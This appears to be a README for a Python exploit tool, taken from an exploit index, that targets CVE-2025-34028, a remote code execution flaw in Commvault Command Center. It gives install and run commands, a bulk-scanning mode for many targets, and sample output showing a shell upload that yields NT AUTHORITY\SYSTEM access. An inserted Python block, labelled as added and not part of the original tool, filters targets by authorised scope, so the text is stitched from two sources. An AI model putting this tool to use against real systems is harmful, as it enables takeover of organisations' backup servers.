## https://sploitus.com/exploit?id=2CE2F376-4CE4-5C78-9CA1-52E40B1BFFC8
# CVE-2025-34028 - Commvault Command Center Remote Code Execution
![Python](https://img.shields.io/badge/python-3.6+-blue.svg) ![License](https://img.shields.io/badge/license-MIT-green.svg) ![Vulnerability](https://img.shields.io/badge/critical-RCE-red.svg)

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

## Features
- Single target or bulk scanning capability
- Automatic Commvault instance verification
- Detailed output with system user information
- Random path generation for each execution
- Clean summary table of vulnerable hosts
- Comprehensive error handling

## Installation
```bash
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
```

## Requirements
- Python 3.6+
- Required packages:
  - requests
  - tabulate

Install requirements with:
```bash
pip install requests tabulate
```

## Usage
```text
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line
```

## Examples
Test a single target:
```bash
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
```

Scan multiple targets from a file:
```bash
python CVE-2025-34028-Commvault.py -f targets.txt
```

## Target File Format
The targets file should contain one target per line in the format:
```text
https://host:port
http://ip
```

Example targets.txt:
```text
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
```
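A pre-flight scope check for the targets file format above, as an added example that is not part of the original tool: it parses each `scheme://host[:port]` line and keeps only hosts inside an authorized engagement scope. The scope values (`SCOPE_NETWORKS`, `SCOPE_HOSTNAMES`), the function names and the `ftp://` sample line are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed engagement scope (assumption): replace with the signed-off scope.
SCOPE_NETWORKS = [ipaddress.ip_network("10.10.10.0/24")]
SCOPE_HOSTNAMES = {"cv.company.com"}

def parse_target(line):
    """Return (scheme, host, port) for one 'scheme://host[:port]' line or raise ValueError."""
    parts = urlsplit(line.strip())
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme must be http or https")
    if not parts.hostname or parts.username or parts.password:
        raise ValueError("expected a bare host without credentials")
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        raise ValueError("expected scheme://host[:port] only")
    # .port raises ValueError itself when the port is not a valid number
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return parts.scheme, parts.hostname, port

def in_scope(host):
    """IP literals must fall in a scoped network; names must match exactly."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host in SCOPE_HOSTNAMES
    return any(addr in net for net in SCOPE_NETWORKS)

def review_targets(text):
    """Split a targets file into approved URLs and (lineno, line, reason) rejections."""
    approved, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        try:
            scheme, host, port = parse_target(line)
        except ValueError as exc:
            rejected.append((lineno, line, str(exc)))
            continue
        if in_scope(host):
            approved.append(f"{scheme}://{host}:{port}")
        else:
            rejected.append((lineno, line, "host not in authorized scope"))
    return approved, rejected

# Constructed sample: the README's example targets.txt plus one malformed line.
SAMPLE = "https://cv.company.com:8000\nhttp://192.168.1.100\nhttps://10.10.10.5:443\nftp://10.10.10.9\n"

if __name__ == "__main__":
    print(review_targets(SAMPLE))
```

Only the approved list should be written to the file passed with `-f`; the rejected entries record why a line was dropped.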

## Output
The script provides:
- Real-time progress with status for each target
- Detailed output for vulnerable hosts
- Summary table of all tested hosts
- Clear identification of successful exploitations

Sample output:
```text
CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+---------+---------------------------------+---------------------+---------------------+
| Index   | URL                             | Status              | System User         |
+---------+---------------------------------+---------------------+---------------------+
| 1       | https://cvtest.example.com:8000 | RCE Successful      | NT AUTHORITY\SYSTEM |
+---------+---------------------------------+---------------------+---------------------+
```

## Disclaimer
This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

## License
MIT License - See LICENSE file for details